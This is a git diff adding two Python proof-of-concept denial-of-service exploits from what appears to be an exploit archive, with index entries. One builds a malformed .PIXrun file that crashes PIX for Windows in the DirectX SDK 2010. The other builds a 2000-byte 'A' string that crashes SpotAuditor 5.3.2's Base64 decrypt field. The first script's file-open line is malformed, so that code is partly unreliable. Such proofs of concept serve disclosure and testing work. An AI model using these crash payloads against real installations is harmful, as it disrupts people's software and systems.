diff --git a/exploits/windows/dos/47718.py b/exploits/windows/dos/47718.py new file mode 100755 index 000000000..a15b1b24f --- /dev/null +++ b/exploits/windows/dos/47718.py @@ -0,0 +1,48 @@ +#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC) +#Exploit Author : ZwX +#Exploit Date: 2019-11-26 +#Vendor Homepage : https://www.microsoft.com/ +#Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681 +#Tested on OS: Windows 7 + +Proof of Concept (PoC): +======================= + +1.Download and install Microsoft DirectX SDK +2.Open the PIX for Windows tools +2.Run the python operating script that will create a file (poc.PIXrun) +3.Run the software "File -> Open File -> Add the file (.PIXrun) " +4.PIX for Windows Crashed + +#!/usr/bin/python + +DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" +"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" +"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" +"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") + +poc = DoS +file = open("poc.PIXrun,"w") +file.write(poc) +file.close() + +print "POC Created by ZwX" \ No newline at end of file diff --git a/exploits/windows/dos/47719.py b/exploits/windows/dos/47719.py new file mode 100755 index 000000000..b8baf33f7 --- /dev/null +++ b/exploits/windows/dos/47719.py @@ -0,0 +1,31 @@ +#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC) +#Exploit Author : ZwX +#Exploit Date: 2019-11-26 +#Vendor Homepage : http://www.nsauditor.com/ +#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe +#Tested on OS: Windows 7 + + +''' +Proof of Concept (PoC): +======================= + +1.Download and install SpotAuditor +2.Run the python operating script that will create a file (poc.txt) +3.Run the software "Tools -> Base64 Encrypted Password +4.Copy and paste the characters in the file (poc.txt) +5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt' +6.SpotAuditor Crashed +''' +#!/usr/bin/python + +http = "http//" +buffer = "\x41" * 2000 + + +poc = http + buffer +file = open("poc.txt","w") +file.write(poc) +file.close() + +print "POC Created by ZwX" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 612098bb4..e447311c8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6609,6 +6609,8 @@ id,file,description,date,author,type,platform,port 47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows, 47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios, 47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows, +47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows, +47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,